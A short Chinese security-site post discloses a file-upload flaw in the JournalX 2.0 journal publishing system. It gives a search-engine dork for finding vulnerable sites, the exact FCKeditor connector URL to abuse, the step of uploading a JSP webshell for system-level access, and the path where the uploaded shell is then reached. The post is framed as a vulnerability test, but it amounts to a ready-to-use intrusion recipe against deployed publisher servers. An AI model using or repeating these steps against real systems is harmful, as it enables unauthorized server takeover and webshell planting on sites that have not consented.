Journal报刊系统Fckeditor-0day

影响版本:JournalX 2.0
官方网站:http://www.magtech.com.cn/

漏洞类型:文件上传

产品介绍:JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。


漏洞描述:因FCKeditor/myconfig.js 过滤不严格导致上传任意格式文件。

google or baidu 关键字:inurl:volumn/current_abs.shtml


漏洞测试:

在Web根目录访问 /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector  

   上传JSP马 = 系统权限。

上传后访问路径:http://www.xxx.com/UserFiles/File/ 马的名字.jsp

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:https://www.yesck.com/post/431/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code